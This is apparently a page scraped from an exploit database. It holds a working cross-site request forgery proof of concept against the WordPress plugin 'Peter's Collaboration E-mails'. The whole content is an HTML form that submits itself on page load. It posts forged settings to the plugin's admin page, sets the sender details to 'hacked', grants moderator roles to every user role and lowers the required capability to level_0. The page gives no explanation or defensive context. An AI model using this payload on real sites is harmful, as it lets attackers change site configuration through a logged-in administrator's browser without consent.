Share
## https://sploitus.com/exploit?id=WPEX-ID:31B413E1-D4B5-463E-9910-37876881C062
<form id="test" action="https://example.com/wp-admin/options-general.php?page=peters_collaboration_emails.php" method="POST">
<input type="text" name="pce_blogname" value="hacked">
<input type="text" name="pce_fromaddress" value="hacked@example.com">
<input type="text" name="pce_fromname" value="hacked">
<input type="text" name="pce_whoapproved" value="1">
<input type="text" name="pce_contributor_roles[]" value="contributor">
<input type="text" name="pce_moderator_roles[]" value="administrator">
<input type="text" name="pce_moderator_roles[]" value="author">
<input type="text" name="pce_moderator_roles[]" value="contributor">
<input type="text" name="pce_moderator_roles[]" value="editor">
<input type="text" name="pce_moderator_roles[]" value="subscriber">
<input type="text" name="pce_emails_to_send[]" value="pending">
<input type="text" name="pce_emails_to_send[]" value="approved">
<input type="text" name="pce_emails_to_send[]" value="future">
<input type="text" name="pce_emails_to_send[]" value="backtodraft">
<input type="text" name="pce_emails_to_send[]" value="wentlive">
<input type="text" name="pce_emails_to_send[]" value="private_to_published">
<input type="text" name="pce_emails_to_send[]" value="edited">
<input type="text" name="pce_required_capability" value="level_0">
<input type="text" name="pce_settingssubmit" value="Aktualisieren">
</form>
<script>
document.getElementById("test").submit();
</script>